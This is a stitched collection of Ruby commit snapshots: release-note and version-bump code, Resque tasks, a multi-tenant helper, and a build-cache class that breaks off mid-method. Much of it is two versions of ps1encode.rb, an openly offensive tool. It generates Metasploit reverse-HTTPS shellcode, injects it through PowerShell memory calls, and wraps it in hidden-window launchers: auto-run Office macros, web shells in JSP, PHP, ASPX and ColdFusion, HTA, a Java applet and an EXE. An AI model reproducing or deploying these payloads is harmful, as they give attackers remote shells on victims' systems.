author_name = commit.author.name
author_email = commit.author.email
commit_message = commit.message
sha = commit.sha
if commit_message !~ /Merge/
puts "(" + sha + ") " + author_name + " <" + author_email + ">: " + commit_message
else
if cli_opts[:merges]
puts "(" + sha + ") " + author_name + " <" + author_email + ">: " + commit_message
end
end
end
end
end
end
Fixing some regex. Also, a fake github issue reference for debugging purposes: #33.
require 'trollop'
require 'releasenoter/version'
require "git"
module Releasenoter
class Cli
def self.start_cli
@opts = Trollop::options do
version "Releasenoter " + Releasenoter::VERSION
opt :since, "Starting point", :type => :string
opt :to, "Ending at", :type => :string
opt :github, "Highlight Github issue commits", :default => true
opt :jira, "Highlight JIRA issue commits", :default => true
opt :merges, "Include merge commits", :default => false
opt :untagged, "Skip commits without issue references", :default => true
end
end
def self.get_opts
return @opts
end
end
class FromGit
def self.get_log
jira_pat = /(\w{2,4}-\d+)/
github_pat = /\#(\d+)/
cli_opts = Releasenoter::Cli.get_opts
if cli_opts[:github]
puts "Will highlight Github issue commits."
end
if cli_opts[:jira]
puts "Will highlight JIRA issue commits."
end
if cli_opts[:merges]
puts "Will include merge commits."
end
@git = Git.open('.')
if cli_opts[:since] && !cli_opts[:to]
gitlog = @git.log.since(cli_opts[:since])
elsif cli_opts[:since] && cli_opts[:to]
gitlog = @git.log.between(cli_opts[:since], cli_opts[:to])
else
gitlog = @git.log
end
gitlog.each do |commit|
author_name = commit.author.name
author_email = commit.author.email
commit_message = commit.message
if commit_message =~ jira_pat
puts commit_message.sub(jira_pat, 'JIRA: \1')
end
if commit_message =~ github_pat
puts commit_message.sub(github_pat, 'GH: \1')
end
sha = commit.sha
if commit_message !~ /Merge/
puts "(" + sha + ") " + author_name + " <" + author_email + ">: " + commit_message
else
if cli_opts[:merges]
puts "(" + sha + ") " + author_name + " <" + author_email + ">: " + commit_message
end
end
end
end
end
end
|
module Relp
VERSION = "0.0.1"
end
first release version
module Relp
VERSION = "0.1"
end
|
# require 'resque/tasks'
# will give you the resque tasks
namespace :resque do
task :setup
desc "Start a Resque worker"
task :work => :setup do
require 'resque'
queues = (ENV['QUEUES'] || ENV['QUEUE']).to_s.split(',')
begin
worker = Resque::Worker.new(*queues)
worker.verbose = ENV['LOGGING'] || ENV['VERBOSE']
worker.very_verbose = ENV['VVERBOSE']
rescue Resque::NoQueueError
abort "set QUEUE env var, e.g. $ QUEUE=critical,high rake resque:work"
end
if ENV['PIDFILE']
File.open(ENV['PIDFILE'], 'w') { |f| f << worker.pid }
end
worker.log "Starting worker #{worker}"
worker.work(ENV['INTERVAL'] || 5) # interval, will block
end
desc "Start multiple Resque workers. Should only be used in dev mode."
task :workers do
threads = []
ENV['COUNT'].to_i.times do
threads << Thread.new do
system "rake resque:work"
end
end
threads.each { |thread| thread.join }
end
end
Attempt to preload files under app/ when using Rails
# require 'resque/tasks'
# will give you the resque tasks
namespace :resque do
task :setup
desc "Start a Resque worker"
task :work => :setup do
require 'resque'
queues = (ENV['QUEUES'] || ENV['QUEUE']).to_s.split(',')
begin
worker = Resque::Worker.new(*queues)
worker.verbose = ENV['LOGGING'] || ENV['VERBOSE']
worker.very_verbose = ENV['VVERBOSE']
rescue Resque::NoQueueError
abort "set QUEUE env var, e.g. $ QUEUE=critical,high rake resque:work"
end
if ENV['PIDFILE']
File.open(ENV['PIDFILE'], 'w') { |f| f << worker.pid }
end
worker.log "Starting worker #{worker}"
worker.work(ENV['INTERVAL'] || 5) # interval, will block
end
desc "Start multiple Resque workers. Should only be used in dev mode."
task :workers do
threads = []
ENV['COUNT'].to_i.times do
threads << Thread.new do
system "rake resque:work"
end
end
threads.each { |thread| thread.join }
end
end
# Preload app files
task :environment do
Dir['app/**/*.rb'].each do |file|
require file
end
end
|
module Rgot
VERSION = "0.0.4"
end
v0.0.5
module Rgot
VERSION = "0.0.5"
end
|
module Rmre
VERSION = "0.0.4" unless defined?(::Rmre::VERSION)
end
Version bump
module Rmre
VERSION = "0.0.5" unless defined?(::Rmre::VERSION)
end
|
module Roomer
module Utils
# Rails DB Migrations Directory
# @return [String] full path to the current migrations directory
def migrations_directory
ActiveRecord::Migrator.migrations_path
end
# Directory where the models are stored
# @return [String] path of the directory where the models are stored
def model_directory
File.join("app","models")
end
# Consutructs the full name for the tenants table with schema
# Example: 'global.tenant'
# @return [String] full name of the tenant table
def full_tenants_table_name
"#{shared_schema_name}#{schema_seperator}#{tenants_table}"
end
# Constructs the full path to the shared schema directory
# Example: /Users/Greg/Projects/roomer/db/migrate/global
# @return [String] full path to the shared schema directory
def full_shared_schema_migration_path
"#{Rails.root}/#{shared_migrations_directory}"
end
# Returns tenant model as a constant
# Example: Tenant
# @return Object
def tenant_model
Roomer.tenants_table.to_s.classify.constantize
end
# Sets current tenant from ApplicationController into a Thread
# local variable. Works only with thread-safe Rails as long as
# it gets set on every request
# @return [Symbol] the current tenant key in the thread
def current_tenant=(val)
key = :"roomer_current_tenant"
Thread.current[key] = val
ensure_tenant_model_reset
end
# Fetches the current tenant
# @return [Symbol] the current tenant key in the thread
def current_tenant
key = :"roomer_current_tenant"
Thread.current[key]
end
# Reset current tenant
# @return [Nil]
def reset_current_tenant
key = :"roomer_current_tenant"
Thread.current[key] = nil
end
# Reset cached data in tenanted models
def ensure_tenant_model_reset
ActiveRecord::Base.descendants.each do |model|
model.roomer_reset if model.tenanted?
end
reload_models
end
protected
def reload_models
Dir["#{Rails.root.to_s}/app/models/**/*.*"].each do |path|
begin
Rails.load "#{path}"
rescue
end
end
end
def clean_environment
ActionDispatch::Reloader.cleanup!
end
end
end
only setting tenant if different
module Roomer
module Utils
# Rails DB Migrations Directory
# @return [String] full path to the current migrations directory
def migrations_directory
ActiveRecord::Migrator.migrations_path
end
# Directory where the models are stored
# @return [String] path of the directory where the models are stored
def model_directory
File.join("app","models")
end
# Consutructs the full name for the tenants table with schema
# Example: 'global.tenant'
# @return [String] full name of the tenant table
def full_tenants_table_name
"#{shared_schema_name}#{schema_seperator}#{tenants_table}"
end
# Constructs the full path to the shared schema directory
# Example: /Users/Greg/Projects/roomer/db/migrate/global
# @return [String] full path to the shared schema directory
def full_shared_schema_migration_path
"#{Rails.root}/#{shared_migrations_directory}"
end
# Returns tenant model as a constant
# Example: Tenant
# @return Object
def tenant_model
Roomer.tenants_table.to_s.classify.constantize
end
# Sets current tenant from ApplicationController into a Thread
# local variable. Works only with thread-safe Rails as long as
# it gets set on every request
# @return [Symbol] the current tenant key in the thread
def current_tenant=(val)
key = :"roomer_current_tenant"
unless Thread.current[key].try(:name) == val.name
Thread.current[key] = val
ensure_tenant_model_reset
end
end
# Fetches the current tenant
# @return [Symbol] the current tenant key in the thread
def current_tenant
key = :"roomer_current_tenant"
Thread.current[key]
end
# Reset current tenant
# @return [Nil]
def reset_current_tenant
key = :"roomer_current_tenant"
Thread.current[key] = nil
end
# Reset cached data in tenanted models
def ensure_tenant_model_reset
ActiveRecord::Base.descendants.each do |model|
model.roomer_reset if model.tenanted?
end
reload_models
end
protected
def reload_models
Dir["#{Rails.root.to_s}/app/models/**/*.*"].each do |path|
begin
Rails.load "#{path}"
rescue
end
end
end
def clean_environment
ActionDispatch::Reloader.cleanup!
end
end
end
|
#!/usr/bin/ruby
#
# ps1encode.rb
#
# by Piotr Marszalik - peter.mars[at]outlook.com
# 05/08/2013
#
#
# Use to generate and encode a powershell based metasploit payloads.
#
#
# Available output types:
# => raw (encoded payload only - no powershell run options)
# => cmd (for use with bat files)
# => vba (for use with macro trojan docs) < developed in conjunction with Ryan Reynolds
# => war (tomcat) < developed in conjuntion with Tony James
# => exe (executable) requires MinGW - i586-mingw32msvc-gcc [apt-get install mingw32]
# => java (for use with malicious java applets)
# => php (for use with php pages)
# => hta (HTML applications)
# => cfm (for use with Adobe ColdFusion)
#
# Powershell code based on PowerSploit written by Matthew Graeber and SET by Dave Kennedy
# DETAILS - http://rvnsec.wordpress.com/2014/09/01/ps1encode-powershell-for-days/
#
require 'optparse'
require 'base64'
options = {}
optparse = OptionParser.new do|opts|
opts.banner = "Usage: ps1encode.rb --LHOST [default = 127.0.0.1] --LPORT [default = 443] --PAYLOAD [default = windows/meterpreter/reverse_https] --ENCODE [default = cmd]"
opts.separator ""
options[:LHOST] = "127.0.0.1"
options[:LPORT] = "443"
options[:PAYLOAD] = "windows/meterpreter/reverse_https"
options[:ENCODE] = "cmd"
opts.on('-i', '--LHOST VALUE', "Local host IP address") do |i|
options[:LHOST] = i
end
opts.on('-p', '--LPORT VALUE', "Local host port number") do |p|
options[:LPORT] = p
end
opts.on('-a', '--PAYLOAD VALUE', "Payload to use") do |a|
options[:PAYLOAD] = a
end
opts.on('-t', '--ENCODE VALUE', "Output format: raw, cmd, vba, war, exe, java, php, hta, cfm") do |t|
options[:ENCODE] = t
end
opts.separator ""
end
if ARGV.empty?
puts optparse
exit
else
optparse.parse!
end
$lhost = options[:LHOST]
$lport = options[:LPORT]
$lpayload = options[:PAYLOAD]
$lencode = options[:ENCODE]
#string byte to hex
class String
def to_hex
#"0x" + self.to_i.to_s(16)
sprintf("0x%02x", self.to_i)
end
end
def gen_PS_shellcode()
results = []
resultsS = ""
#generate the shellcode via msfvenom and write to a temp txt file
system("msfvenom -p #{$lpayload} LHOST=#{$lhost} LPORT=#{$lport} -s 341 -f raw > raw_shellcode_temp")
#taking raw shellcode, each byte goes into array
File.open('raw_shellcode_temp').each_byte do |b|
results << b
end
#remove temp
system("rm raw_shellcode_temp")
#go through the array, convert each byte in the array to a hex string
results.each do |i|
resultsS = resultsS + i.to_s.to_hex + ","
end
#remove last unnecessary comma
resultsS = resultsS.chop
#powershell script to be executed pre-encode
finstring = "$1 = '$c = ''[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport(\"msvcrt.dll\")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name \"Win32\" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = #{resultsS};$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + \"\\syswow64\\WindowsPowerShell\\v1.0\\powershell\";$cmd = \"-nop -noni -enc \";iex \"& $x86 $cmd $gq\"}else{$cmd = \"-nop -noni -enc\";iex \"& powershell $cmd $gq\";}"
#convert to UTF-16 (powershell interprets base64 of UTF-16)
ec = Encoding::Converter.new("UTF-8", "UTF-16LE")
utfEncoded = ec.convert(finstring)
#string to base64 - final
finPS = Base64.encode64(utfEncoded).gsub(/\n/, '')
return finPS
end
def prep_PS_chunk(ps_shellcode)
#The below iterates through the string and chops up strings into 254 character lengths & puts it into a 2-dimensional array
splitup = []
splitup = ps_shellcode.scan(/.{1,254}/)
stringCommands=""
varFinal="stringFinal=stringA+"
splitup = splitup.flatten #make the 2-dimensional array 1-dimensional to easier iterate
splitup.each_with_index do |val, index| #cycle through the array and create the strings for VBA
val=val.tr '"','' #strip out any prior quotes in the command
stringCommands = stringCommands+"string#{index}=\"#{val}\"\n"
varFinal=varFinal+"string#{index}+"
end
varFinal=varFinal[0..-2] #create the final command that will be executed, this removes the "+" sign from the last command
return stringCommands + "\n" + varFinal
end
###########################RAW_ENCODE###########################
if $lencode == "raw"
powershell_encoded = gen_PS_shellcode()
puts powershell_encoded
end
##########################CMD_ENCODE###########################
if $lencode == "cmd"
powershell_encoded = gen_PS_shellcode()
puts "powershell -nop -win Hidden -noni -enc " + powershell_encoded
end
########################VBS_ENCODE###############################
if $lencode == "vba"
powershell_encoded = gen_PS_shellcode()
prepped_powershell_encoded = prep_PS_chunk(powershell_encoded)
#final VBA template
vbaTEMPLATE = %{Sub Auto_Open()
stringA = "powershell.exe -NoE -NoP -NonI -W Hidden -E "
#{prepped_powershell_encoded}
Shell stringFinal, 0
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
}
puts vbaTEMPLATE
end
########################WAR_ENCODE###############################
if $lencode == "war"
powershell_encoded = gen_PS_shellcode()
warTEMPLATE = %{<%@ page import="java.io.*" %>
<html>
<head>
<title>Sample</title>
</head>
<body>
<%
String yourCommand[]=\{"cmd.exe" ,"/C", " powershell -nop -win Hidden -noni -enc #{powershell_encoded} "\};
try \{
Process p = Runtime.getRuntime().exec(yourCommand);
BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));
BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream()));
\} catch (IOException ioe) \{
System.err.println("\\n\\n\\nIOException: "+ ioe.toString());
\}
%>
</body>
</html>
}
#web.xml - saved within WEB-INF directory
webxmlTEMPLATE = %{<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<servlet>
<servlet-name>Sample</servlet-name>
<jsp-file>/sample.jsp</jsp-file>
</servlet>
</web-app>
}
#temp dir - write in jsp file
system("mkdir wartemp")
jsp_file_temp = File.new("wartemp/sample.jsp", "w")
jsp_file_temp.write(warTEMPLATE)
jsp_file_temp.close
#new WEB-INF directory, write in web.xml
system("mkdir wartemp/WEB-INF")
webxml_file_temp = File.new("wartemp/WEB-INF/web.xml", "w")
webxml_file_temp.write(webxmlTEMPLATE)
webxml_file_temp.close
#Create JAR file
system("jar -cvf sample.war -C wartemp/ .")
#clean up
system("rm -r wartemp")
end
########################EXE_ENCODE###############################
if $lencode == "exe"
#determine if MinGW has been installed, support new and old MinGW system paths
mingw = true if File::exists?('/usr/i586-mingw32msvc') || File::exists?('/usr/bin/i586-migw32msvc')
if mingw == false
puts "Must have MinGW installed in order to compile EXEs!!"
puts "\n\tRun to download: apt-get install mingw32 \n"
exit 1
end
powershell_encoded = gen_PS_shellcode()
exeTEMPLATE = %{#include <stdio.h>
#include <stdlib.h>
int main()
\{
system("powershell -nop -win Hidden -noni -enc #{powershell_encoded}");
return 0;
\}
}
#write out to a new file
c_file_temp = File.new("c_file_temp.c", "w")
c_file_temp.write(exeTEMPLATE)
c_file_temp.close
#compiling will require MinGW installed - "apt-get install mingw32"
puts "compiling..."
system("i586-mingw32msvc-gcc c_file_temp.c -o final_.exe")
system("rm c_file_temp.c")
puts "final_.exe created!"
end
########################JAVA_ENCODE###############################
if $lencode == "java"
powershell_encoded = gen_PS_shellcode()
javaTEMPLATE = %{import java.applet.*;
import java.awt.*;
import java.io.*;
public class Java extends Applet \{
public void init() \{
Process f;
String cmd = "cmd.exe /c powershell -nop -win Hidden -noni -enc #{powershell_encoded}";
try \{
f = Runtime.getRuntime().exec(cmd);
\}
catch(IOException e) \{
e.printStackTrace();
\}
Process s;
\}
\}
}
puts javaTEMPLATE
end
######################PHP_ENCODE###############################
if $lencode == "php"
powershell_encoded = gen_PS_shellcode()
phpTEMPLATE = %{<?php
system("cmd.exe /c powershell -nop -win Hidden -noni -enc #{powershell_encoded}");
?>
}
puts phpTEMPLATE
end
######################HTA_ENCODE###############################
if $lencode == "hta"
powershell_encoded = gen_PS_shellcode()
htaTEMPLATE = %{<html>
<head>
<script language="VBScript">
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c powershell -nop -win Hidden -noni -enc #{powershell_encoded}", 0
</script>
</head>
<body>
<!-- info -->
</body>
</html>
}
puts htaTEMPLATE
end
######################CFM_ENCODE###############################
if $lencode == "cfm"
powershell_encoded = gen_PS_shellcode()
cfmTEMPLATE = %{<cfexecute name = "C:\\Windows\\System32\\cmd.exe"
arguments = "/c powershell -nop -win Hidden -noni -enc #{powershell_encoded}"
timeout = "10">
</cfexecute>
}
puts cfmTEMPLATE
end
Added aspx support and updated options.
#!/usr/bin/ruby
#
# ps1encode.rb
#
# by Piotr Marszalik - peter.mars[at]outlook.com
# 05/08/2013
#
#
# Use to generate and encode a powershell based metasploit payloads.
#
#
# Available output types:
# => raw (encoded payload only - no powershell run options)
# => cmd (for use with bat files)
# => vba (for use with macro trojan docs) < developed in conjunction with Ryan Reynolds
# => war (tomcat) < developed in conjuntion with Tony James
# => exe (executable) requires MinGW - i586-mingw32msvc-gcc [apt-get install mingw32]
# => java (for use with malicious java applets)
# => php (for use with php pages)
# => hta (HTML applications)
# => cfm (for use with Adobe ColdFusion)
# => aspx (for use with ASP.NET)
#
# Powershell code based on PowerSploit written by Matthew Graeber and SET by Dave Kennedy
# DETAILS - http://rvnsec.wordpress.com/2014/09/01/ps1encode-powershell-for-days/
#
require 'optparse'
require 'base64'
options = {}
optparse = OptionParser.new do|opts|
opts.banner = "Usage: ps1encode.rb --LHOST [default = 127.0.0.1] --LPORT [default = 443] --PAYLOAD [default = windows/meterpreter/reverse_https] --ENCODE [default = cmd]"
opts.separator ""
options[:LHOST] = "127.0.0.1"
options[:LPORT] = "443"
options[:PAYLOAD] = "windows/meterpreter/reverse_https"
options[:ENCODE] = "cmd"
opts.on('-i', '--LHOST VALUE', "Local host IP address") do |i|
options[:LHOST] = i
end
opts.on('-p', '--LPORT VALUE', "Local host port number") do |p|
options[:LPORT] = p
end
opts.on('-a', '--PAYLOAD VALUE', "Payload to use") do |a|
options[:PAYLOAD] = a
end
opts.on('-t', '--ENCODE VALUE', "Output format: raw, cmd, vba, war, exe, java, php, hta, cfm, aspx") do |t|
options[:ENCODE] = t
end
opts.separator ""
end
if ARGV.empty?
puts optparse
exit
else
optparse.parse!
end
$lhost = options[:LHOST]
$lport = options[:LPORT]
$lpayload = options[:PAYLOAD]
$lencode = options[:ENCODE]
#string byte to hex
class String
def to_hex
#"0x" + self.to_i.to_s(16)
sprintf("0x%02x", self.to_i)
end
end
def gen_PS_shellcode()
results = []
resultsS = ""
#generate the shellcode via msfvenom and write to a temp txt file
system("msfvenom -p #{$lpayload} LHOST=#{$lhost} LPORT=#{$lport} -s 341 -f raw > raw_shellcode_temp")
#taking raw shellcode, each byte goes into array
File.open('raw_shellcode_temp').each_byte do |b|
results << b
end
#remove temp
system("rm raw_shellcode_temp")
#go through the array, convert each byte in the array to a hex string
results.each do |i|
resultsS = resultsS + i.to_s.to_hex + ","
end
#remove last unnecessary comma
resultsS = resultsS.chop
#powershell script to be executed pre-encode
finstring = "$1 = '$c = ''[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport(\"msvcrt.dll\")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name \"Win32\" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = #{resultsS};$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + \"\\syswow64\\WindowsPowerShell\\v1.0\\powershell\";$cmd = \"-nop -noni -enc \";iex \"& $x86 $cmd $gq\"}else{$cmd = \"-nop -noni -enc\";iex \"& powershell $cmd $gq\";}"
#convert to UTF-16 (powershell interprets base64 of UTF-16)
ec = Encoding::Converter.new("UTF-8", "UTF-16LE")
utfEncoded = ec.convert(finstring)
#string to base64 - final
finPS = Base64.encode64(utfEncoded).gsub(/\n/, '')
return finPS
end
def prep_PS_chunk(ps_shellcode)
#The below iterates through the string and chops up strings into 254 character lengths & puts it into a 2-dimensional array
splitup = []
splitup = ps_shellcode.scan(/.{1,254}/)
stringCommands=""
varFinal="stringFinal=stringA+"
splitup = splitup.flatten #make the 2-dimensional array 1-dimensional to easier iterate
splitup.each_with_index do |val, index| #cycle through the array and create the strings for VBA
val=val.tr '"','' #strip out any prior quotes in the command
stringCommands = stringCommands+"string#{index}=\"#{val}\"\n"
varFinal=varFinal+"string#{index}+"
end
varFinal=varFinal[0..-2] #create the final command that will be executed, this removes the "+" sign from the last command
return stringCommands + "\n" + varFinal
end
###########################RAW_ENCODE###########################
if $lencode == "raw"
powershell_encoded = gen_PS_shellcode()
puts powershell_encoded
end
##########################CMD_ENCODE###########################
if $lencode == "cmd"
powershell_encoded = gen_PS_shellcode()
puts "powershell -nop -win Hidden -noni -enc " + powershell_encoded
end
########################VBS_ENCODE###############################
if $lencode == "vba"
powershell_encoded = gen_PS_shellcode()
prepped_powershell_encoded = prep_PS_chunk(powershell_encoded)
#final VBA template
vbaTEMPLATE = %{Sub Auto_Open()
stringA = "powershell.exe -NoE -NoP -NonI -W Hidden -E "
#{prepped_powershell_encoded}
Shell stringFinal, 0
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
}
puts vbaTEMPLATE
end
########################WAR_ENCODE###############################
if $lencode == "war"
powershell_encoded = gen_PS_shellcode()
warTEMPLATE = %{<%@ page import="java.io.*" %>
<html>
<head>
<title>Sample</title>
</head>
<body>
<%
String yourCommand[]=\{"cmd.exe" ,"/C", " powershell -nop -win Hidden -noni -enc #{powershell_encoded} "\};
try \{
Process p = Runtime.getRuntime().exec(yourCommand);
BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));
BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream()));
\} catch (IOException ioe) \{
System.err.println("\\n\\n\\nIOException: "+ ioe.toString());
\}
%>
</body>
</html>
}
#web.xml - saved within WEB-INF directory
webxmlTEMPLATE = %{<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<servlet>
<servlet-name>Sample</servlet-name>
<jsp-file>/sample.jsp</jsp-file>
</servlet>
</web-app>
}
#temp dir - write in jsp file
system("mkdir wartemp")
jsp_file_temp = File.new("wartemp/sample.jsp", "w")
jsp_file_temp.write(warTEMPLATE)
jsp_file_temp.close
#new WEB-INF directory, write in web.xml
system("mkdir wartemp/WEB-INF")
webxml_file_temp = File.new("wartemp/WEB-INF/web.xml", "w")
webxml_file_temp.write(webxmlTEMPLATE)
webxml_file_temp.close
#Create JAR file
system("jar -cvf sample.war -C wartemp/ .")
#clean up
system("rm -r wartemp")
end
########################EXE_ENCODE###############################
if $lencode == "exe"
#determine if MinGW has been installed, support new and old MinGW system paths
mingw = true if File::exists?('/usr/i586-mingw32msvc') || File::exists?('/usr/bin/i586-migw32msvc')
if mingw == false
puts "Must have MinGW installed in order to compile EXEs!!"
puts "\n\tRun to download: apt-get install mingw32 \n"
exit 1
end
powershell_encoded = gen_PS_shellcode()
exeTEMPLATE = %{#include <stdio.h>
#include <stdlib.h>
int main()
\{
system("powershell -nop -win Hidden -noni -enc #{powershell_encoded}");
return 0;
\}
}
#write out to a new file
c_file_temp = File.new("c_file_temp.c", "w")
c_file_temp.write(exeTEMPLATE)
c_file_temp.close
#compiling will require MinGW installed - "apt-get install mingw32"
puts "compiling..."
system("i586-mingw32msvc-gcc c_file_temp.c -o final_.exe")
system("rm c_file_temp.c")
puts "final_.exe created!"
end
########################JAVA_ENCODE###############################
if $lencode == "java"
powershell_encoded = gen_PS_shellcode()
javaTEMPLATE = %{import java.applet.*;
import java.awt.*;
import java.io.*;
public class Java extends Applet \{
public void init() \{
Process f;
String cmd = "cmd.exe /c powershell -nop -win Hidden -noni -enc #{powershell_encoded}";
try \{
f = Runtime.getRuntime().exec(cmd);
\}
catch(IOException e) \{
e.printStackTrace();
\}
Process s;
\}
\}
}
puts javaTEMPLATE
end
######################PHP_ENCODE###############################
if $lencode == "php"
powershell_encoded = gen_PS_shellcode()
phpTEMPLATE = %{<?php
system("cmd.exe /c powershell -nop -win Hidden -noni -enc #{powershell_encoded}");
?>
}
puts phpTEMPLATE
end
######################HTA_ENCODE###############################
if $lencode == "hta"
powershell_encoded = gen_PS_shellcode()
htaTEMPLATE = %{<html>
<head>
<script language="VBScript">
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c powershell -nop -win Hidden -noni -enc #{powershell_encoded}", 0
</script>
</head>
<body>
<!-- info -->
</body>
</html>
}
puts htaTEMPLATE
end
######################CFM_ENCODE###############################
if $lencode == "cfm"
powershell_encoded = gen_PS_shellcode()
cfmTEMPLATE = %{<cfexecute name = "C:\\Windows\\System32\\cmd.exe"
arguments = "/c powershell -nop -win Hidden -noni -enc #{powershell_encoded}"
timeout = "10">
</cfexecute>
}
puts cfmTEMPLATE
end
######################ASPX_ENCODE##############################
if $lencode == "aspx"
powershell_encoded = gen_PS_shellcode()
aspxTEMPLATE = %{
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
private void Page_Load(object sender, System.EventArgs e){
System.Diagnostics.Process process = new System.Diagnostics.Process();
process.StartInfo.FileName = "powershell.exe";
process.StartInfo.Arguments = " -nop -win Hidden -noni -enc #{powershell_encoded}";
process.Start();
}
</script>
}
puts aspxTEMPLATE
end
|
require "digest/md5"
require "fileutils"
require "json"
require "set"
require "rscons/version"
module Rscons
# The Cache class keeps track of file checksums, build target commands and
# dependencies in a JSON file which persists from one invocation to the next.
# Example cache:
# {
# "version" => "1.2.3",
# "targets" => {
# "program" => {
# "checksum" => "A1B2C3D4",
# "command" => "13543518FE",
# "deps" => [
# {
# "fname" => "program.o",
# "checksum" => "87654321",
# },
# ],
# "user_deps" => [
# {
# "fname" => "lscript.ld",
# "checksum" => "77551133",
# },
# ],
# },
# "program.o" => {
# "checksum" => "87654321",
# "command" => "98765ABCD",
# "deps" => [
# {
# "fname" => "program.c",
# "checksum" => "456789ABC",
# },
# {
# "fname" => "program.h",
# "checksum" => "7979764643",
# },
# ],
# "user_deps" => [],
# }
# },
# "directories" => {
# "build" => true,
# "build/one" => true,
# "build/two" => true,
# },
# }
class Cache
# Name of the file to store cache information in
CACHE_FILE = ".rsconscache"
# Prefix for phony cache entries.
PHONY_PREFIX = ":PHONY:"
class << self
# Access the singleton instance.
def instance
@instance ||= Cache.new
end
end
# Create a Cache object and load in the previous contents from the cache
# file.
def initialize
initialize!
end
# Remove the cache file.
#
# @return [void]
def clear
FileUtils.rm_f(CACHE_FILE)
initialize!
end
# Clear the cached file checksums.
#
# @return [void]
def clear_checksum_cache!
@lookup_checksums = {}
end
# Return whether the project has been configured.
#
# @return [Boolean]
# Whether the project has been configured.
def configured?
@cache["configured"]
end
# Set whether the project has been configured.
#
# @param configured [Boolean]
# Whether the project has been configured.
#
# @return [void]
def set_configured(configured)
@cache["configured"] = configured
@dirty = true
end
# Access configuration data.
def configuration_data
@cache["configuration_data"]
end
# Set configuration data.
#
# @param value [Hash]
# Configuration data.
def configuration_data=(value)
@cache["configuration_data"] = value
@dirty = true
end
# Write the cache to disk if it is dirty.
#
# @return [void]
def write
if @dirty || (@cache["version"] != VERSION)
@cache["version"] = VERSION
validate_json_object(@cache)
File.open(CACHE_FILE, "w") do |fh|
fh.puts(JSON.dump(@cache))
end
end
@dirty = false
end
# Force a write of the cache to disk.
#
# @return [void]
def write!
@dirty = true
write
end
# Check if target(s) are up to date.
#
# @param targets [Symbol, String, Array<String>]
# The name(s) of the target file(s).
# @param command [String, Array, Hash]
# The command used to build the target. The command parameter can
# actually be a String, Array, or Hash and could contain information
# other than just the actual command used to build the target. For the
# purposes of the Cache, any difference in the command argument will
# trigger a rebuild.
# @param deps [Array<String>] List of the target's dependency files.
# @param env [Environment] The Rscons::Environment.
# @param options [Hash] Optional options.
# @option options [Boolean] :debug
# If turned on, this causes the Cache to print messages explaining why
# a build target is out of date. This could aid a builder author in
# debugging the operation of their builder.
# @option options [Boolean] :strict_deps
# Only consider a target up to date if its list of dependencies is
# exactly equal (including order) to the cached list of dependencies
#
# @return [Boolean]
# True value if the targets are all up to date, meaning that,
# for each target:
# - the target exists on disk
# - the cache has information for the target
# - the target's checksum matches its checksum when it was last built
# - the command used to build the target is the same as last time
# - all dependencies listed are also listed in the cache, or, if
# :strict_deps was given in options, the list of dependencies is
# exactly equal to those cached
# - each cached dependency file's current checksum matches the checksum
# stored in the cache file
def up_to_date?(targets, command, deps, env, options = {})
Array(targets).each do |target|
cache_key = get_cache_key(target)
unless Rscons.phony_target?(target)
# target file must exist on disk
unless File.exists?(target)
if options[:debug]
puts "Target #{target} needs rebuilding because it does not exist on disk"
end
return false
end
end
# target must be registered in the cache
unless @cache["targets"].has_key?(cache_key)
if options[:debug]
puts "Target #{target} needs rebuilding because there is no cached build information for it"
end
return false
end
unless Rscons.phony_target?(target)
# target must have the same checksum as when it was built last
unless @cache["targets"][cache_key]["checksum"] == lookup_checksum(target)
if options[:debug]
puts "Target #{target} needs rebuilding because it has been changed on disk since being built last"
end
return false
end
end
# command used to build target must be identical
